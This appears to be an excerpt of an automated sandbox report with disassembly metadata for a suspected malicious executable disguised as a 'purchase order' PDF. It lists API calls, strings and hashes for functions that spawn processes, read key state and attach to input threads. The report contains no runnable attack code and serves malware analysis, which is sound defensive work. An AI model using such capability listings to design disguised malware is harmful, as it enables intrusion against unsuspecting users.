list, xrefs: 008C96D5
largeicons, xrefs: 008C9687

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 970fafb4a75def230a362e001055750bc4efd493f0a5fa4d437ed0de949f8b3d
Instruction ID: 0f8944860a262d2e30244dfb31d1dd116073da9f22ad311be2df8ce94ac8b6d3
Opcode Fuzzy Hash: 970fafb4a75def230a362e001055750bc4efd493f0a5fa4d437ed0de949f8b3d
Instruction Fuzzy Hash: E811A776248317BAEA013624EC0EEA677ACFF25764F20006AFA00E50E5FE71D9519559

Function 008E8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008E8BEC
CoInitialize.OLE32(00000000), ref: 008E8C19
CoUninitialize.OLE32 ref: 008E8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 008E8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 008E8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00902C0C), ref: 008E8E84
CoGetObject.OLE32(?,00000000,00902C0C,?), ref: 008E8EA7
SetErrorMode.KERNEL32(00000000), ref: 008E8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008E8F3A
VariantClear.OLEAUT32(?), ref: 008E8F4A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: e07183ff2b77ec5c9dd3de48f18aeb2db4b02cb8ce943cf55e16972badb0d5eb
Instruction ID: 53b955fcd9f38350379173d5bcccfdbe85412fc680e02fb62ec7fcdd5c49c479
Opcode Fuzzy Hash: e07183ff2b77ec5c9dd3de48f18aeb2db4b02cb8ce943cf55e16972badb0d5eb
Instruction Fuzzy Hash: B6C1FF71208245EFD700DF69C88492ABBE9FF8A348F00496DF58ADB261DB71ED05CB52

Function 008D4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 008D419D
__swprintf.LIBCMT ref: 008D41AA

Part of subcall function 008938D8: __woutput_l.LIBCMT ref: 00893931

FindResourceW.KERNEL32(?,?,0000000E), ref: 008D41D4
LoadResource.KERNEL32(?,00000000), ref: 008D41E0
LockResource.KERNEL32(00000000), ref: 008D41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 008D420D
LoadResource.KERNEL32(?,00000000), ref: 008D421F
SizeofResource.KERNEL32(?,00000000), ref: 008D422E
LockResource.KERNEL32(?), ref: 008D423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008D429B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: dd254742d108b49adee8596d5327607c428ed4507a2b92efea8a6fe162041a0d
Instruction ID: 9e97e927023bed11cd58054666300b23dafe7f7a1adb88d6994e655d2fd9d6d8
Opcode Fuzzy Hash: dd254742d108b49adee8596d5327607c428ed4507a2b92efea8a6fe162041a0d
Instruction Fuzzy Hash: A731ADB160521AABDF119FA0DC88EBB7BACFF08301F044626F901D2251E730DA61DBA4

Function 008D16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008D1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,008D0778,?,00000001), ref: 008D1714
GetWindowThreadProcessId.USER32(00000000), ref: 008D171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008D0778,?,00000001), ref: 008D172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 008D173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008D0778,?,00000001), ref: 008D1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008D0778,?,00000001), ref: 008D1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008D0778,?,00000001), ref: 008D17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008D0778,?,00000001), ref: 008D17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008D0778,?,00000001), ref: 008D17CC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b2e3c4271ea1c2eab4158c3ecd7186e4a91d3dd0f6de4e917fb268a0c0345939
Instruction ID: bcd934c00d5ea18912e388d93a10bfa03c14a83de76f45e6b7fd7a8174a18f1a
Opcode Fuzzy Hash: b2e3c4271ea1c2eab4158c3ecd7186e4a91d3dd0f6de4e917fb268a0c0345939
Instruction Fuzzy Hash: 14317CB5618204BBEB21AF64DC88F79BBAAFF55711F104126F905CA3A0DB749D80DF60

Function 0087FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0087FC06
OleUninitialize.OLE32(?,00000000), ref: 0087FCA5
UnregisterHotKey.USER32(?), ref: 0087FDFC
DestroyWindow.USER32(?), ref: 008B4A00
FreeLibrary.KERNEL32(?), ref: 008B4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 008B4A92

Strings

close all, xrefs: 0087FC01

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 225210b38791313776c3af4575777c3ed6dd47dce70084178fb0e187216496a7
Instruction ID: 13eefa77cebbfd0aac0bc961d5ce41312c03bf5621ce2e5d87ded4fa2a186c89
Opcode Fuzzy Hash: 225210b38791313776c3af4575777c3ed6dd47dce70084178fb0e187216496a7
Instruction Fuzzy Hash: B0A15A317012228FCB29EB19C495A69F764FF04710F1492ADEA0AEB366DB30ED16CF55

Function 008CA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,008CAA64), ref: 008CA9A2

Strings

REGEXPCLASS, xrefs: 008CA767
TEXT, xrefs: 008CA8D9
INSTANCE, xrefs: 008CA8B0
NAME, xrefs: 008CA7D4
CLASS, xrefs: 008CA721
CLASSNN, xrefs: 008CA744

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5280329179e0b958cd9666bb92c81580dd5248a5a727477f0d8a0e0d2afdb97e
Instruction ID: 947642f7b8df9110da5c0cd8c3599ba45c05ec0a2c3ec49237ef202d8e3b7d00
Opcode Fuzzy Hash: 5280329179e0b958cd9666bb92c81580dd5248a5a727477f0d8a0e0d2afdb97e
Instruction Fuzzy Hash: 3491447090060AABDF1CEF64C482FE9FBB5FF04318F548129D599E7251DB30A999CB92

Function 00872E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00872EAE

Part of subcall function 00871DB3: GetClientRect.USER32(?,?), ref: 00871DDC
Part of subcall function 00871DB3: GetWindowRect.USER32(?,?), ref: 00871E1D
Part of subcall function 00871DB3: ScreenToClient.USER32(?,?), ref: 00871E45

GetDC.USER32 ref: 008ACF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008ACF95
SelectObject.GDI32(00000000,00000000), ref: 008ACFA3
SelectObject.GDI32(00000000,00000000), ref: 008ACFB8
ReleaseDC.USER32(?,00000000), ref: 008ACFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008AD04B

Strings

U, xrefs: 008ACF20

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 536a89ae43550be52ebfd4d23f1f33164999ae13c273d955ac6b2f2c2f11f2e0
Instruction ID: 92365b2b1861b08297380d9a3f0941e2b6b8ffd49821bde0df9d486253f6d5ed
Opcode Fuzzy Hash: 536a89ae43550be52ebfd4d23f1f33164999ae13c273d955ac6b2f2c2f11f2e0
Instruction Fuzzy Hash: 4271D531400209EFDF218F64C884ABA7BB5FF4A354F148269ED56DA66ACB31CC41DF61

Function 008FC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

Part of subcall function 00872344: GetCursorPos.USER32(?), ref: 00872357
Part of subcall function 00872344: ScreenToClient.USER32(009367B0,?), ref: 00872374
Part of subcall function 00872344: GetAsyncKeyState.USER32(00000001), ref: 00872399
Part of subcall function 00872344: GetAsyncKeyState.USER32(00000002), ref: 008723A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 008FC2E4
ImageList_EndDrag.COMCTL32 ref: 008FC2EA
ReleaseCapture.USER32 ref: 008FC2F0
SetWindowTextW.USER32(?,00000000), ref: 008FC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008FC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 008FC48F

Strings

@GUI_DRAGFILE, xrefs: 008FC424
@GUI_DROPID, xrefs: 008FC3E1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 1953a2b61a4a18b0c0f9012ed4bb9c60833fc5a05ceb7a61d4211b3a47b88346
Instruction ID: f560512ad668215d0fbd204c7af41f0e41a2ae31b0d212b0fe9c3d648708f445
Opcode Fuzzy Hash: 1953a2b61a4a18b0c0f9012ed4bb9c60833fc5a05ceb7a61d4211b3a47b88346
Instruction Fuzzy Hash: A1518C70208308AFD714EF24C895F7A7BE5FF88310F108529F6958B2A2DB71E954DB52

Function 008E8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,008FF910), ref: 008E903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,008FF910), ref: 008E9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008E91EB
SysFreeString.OLEAUT32(?), ref: 008E9215

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 126a95a81081782618bf3409e45493eb87f5564011c4b0368da5e67319673e4f
Instruction ID: c554f4cf447fc132908bdfe6111196fc33f24e30539257716f6b92bc8eb01395
Opcode Fuzzy Hash: 126a95a81081782618bf3409e45493eb87f5564011c4b0368da5e67319673e4f
Instruction Fuzzy Hash: 0CF12771A00209EFDB04DF99C888EAEB7B9FF4A314F108059F955EB291DB71AE45CB50

Function 008EF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008EF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008EFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008EFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008EFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008EFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008EFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008EFD90
CloseHandle.KERNEL32(?), ref: 008EFDBF
CloseHandle.KERNEL32(?), ref: 008EFE36

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 687948f8d2e1ca0d4b70b089f733897ea56faad95fdb6895c551198fb15cc63c
Instruction ID: 0ad68c603756b47b7cb660671097a5a3395f8e2f976e5912f5a0e23d02e0dcc3
Opcode Fuzzy Hash: 687948f8d2e1ca0d4b70b089f733897ea56faad95fdb6895c551198fb15cc63c
Instruction Fuzzy Hash: E3E18F312042519FCB14EF29C881A6ABBE1FF85354F14856DFA99DB3A2DB31EC40CB52

Function 008D4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008D48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008D38D3,?), ref: 008D48C7

Part of subcall function 008D48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008D38D3,?), ref: 008D48E0

Part of subcall function 008D4CD3: GetFileAttributesW.KERNEL32(?,008D3947), ref: 008D4CD4

lstrcmpiW.KERNEL32(?,?), ref: 008D4FE2
_wcscmp.LIBCMT ref: 008D4FFC
MoveFileW.KERNEL32(?,?), ref: 008D5017

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: a8c3b713e1d3a6fd59d5b353635e05658512c50d0bb214a48964cdd135ce878e
Instruction ID: f7489720596062be98f8248ca138330ad13a5aa4bc59fb4cdb148e0a1f9c111c
Opcode Fuzzy Hash: a8c3b713e1d3a6fd59d5b353635e05658512c50d0bb214a48964cdd135ce878e
Instruction Fuzzy Hash: 6B5132B24087855BC724EB64C8819DFB3DCFF85340F144A2FB689D3252EF75A5888766

Function 008F88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008F896E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 912da2ededf0a3ff09cd8ddac6bf4a3000b87ae99254d4c9cc8c0a1d29aef9cc
Instruction ID: 049ae1ce5d023f0cf634a6c5a37239d29c403aa7abfa3a361d1823a5e036d18c
Opcode Fuzzy Hash: 912da2ededf0a3ff09cd8ddac6bf4a3000b87ae99254d4c9cc8c0a1d29aef9cc
Instruction Fuzzy Hash: A9518C30A1421DFEEF209B388C85BB97B65FF04364F604122F715E65A1DFB1A990DB92

Function 00872B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008AC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008AC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008AC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008AC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008AC5C0
DestroyIcon.USER32(00000000), ref: 008AC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008AC5EC
DestroyIcon.USER32(?), ref: 008AC5FB

Part of subcall function 008FA71E: DeleteObject.GDI32(00000000), ref: 008FA757

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: d11e6e0232046afb03d27762e80bdee66a5c169050d84567b0e6d5ce60cca352
Instruction ID: 23a3ff8ad468d5a437952387da6fdcd3010d85f71bcefd1772e2dacee4cea374
Opcode Fuzzy Hash: d11e6e0232046afb03d27762e80bdee66a5c169050d84567b0e6d5ce60cca352
Instruction Fuzzy Hash: 2F513670A00209EFEB24DF28CC45FAA7BA5FB59324F108529F956D76A0DB70E990DB50

Function 008C8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008C8A84,00000B00,?,?), ref: 008C8E0C
HeapAlloc.KERNEL32(00000000,?,008C8A84,00000B00,?,?), ref: 008C8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008C8A84,00000B00,?,?), ref: 008C8E28
GetCurrentProcess.KERNEL32(?,00000000,?,008C8A84,00000B00,?,?), ref: 008C8E30
DuplicateHandle.KERNEL32(00000000,?,008C8A84,00000B00,?,?), ref: 008C8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008C8A84,00000B00,?,?), ref: 008C8E43
GetCurrentProcess.KERNEL32(008C8A84,00000000,?,008C8A84,00000B00,?,?), ref: 008C8E4B
DuplicateHandle.KERNEL32(00000000,?,008C8A84,00000B00,?,?), ref: 008C8E4E
CreateThread.KERNEL32(00000000,00000000,008C8E74,00000000,00000000,00000000), ref: 008C8E68

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 4f72f0dcc58df7583dd389db18bf885e1fdab9f9db10d3012c3c46d4f105b5b9
Instruction ID: d6b244d1348d542491ff7b111bba4258348288283af36ee83167a9fb410b8bbc
Opcode Fuzzy Hash: 4f72f0dcc58df7583dd389db18bf885e1fdab9f9db10d3012c3c46d4f105b5b9
Instruction Fuzzy Hash: C401A8B5240308FFE611ABB5DC89F6B3BACFF89711F004421FA05DB2A2DA749850CA20

Function 008E9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008E947C
VariantInit.OLEAUT32(?), ref: 008E954D
VariantInit.OLEAUT32(?), ref: 008E964E
VariantClear.OLEAUT32(?), ref: 008E9658
VariantClear.OLEAUT32(?), ref: 008E96B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 008E9631
Null Object assignment in FOR..IN loop, xrefs: 008E94DD, 008E960B, 008E96C3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 860b118a23abffb09b3b63caae6bae65c8ce9bfa5221572e5b3d5d56faf45a48
Instruction ID: 3310982127eb205f6dbe4c58a83a7797acc33e94899bc4a3b7a89a44d492ca69
Opcode Fuzzy Hash: 860b118a23abffb09b3b63caae6bae65c8ce9bfa5221572e5b3d5d56faf45a48
Instruction Fuzzy Hash: 5291B071A00259ABDF20DFA6C844FAEB7B8FF96314F10815AF545EB290D7B09945CFA0

Function 008E9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 008C7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?,?,008C799D), ref: 008C766F
Part of subcall function 008C7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?), ref: 008C768A
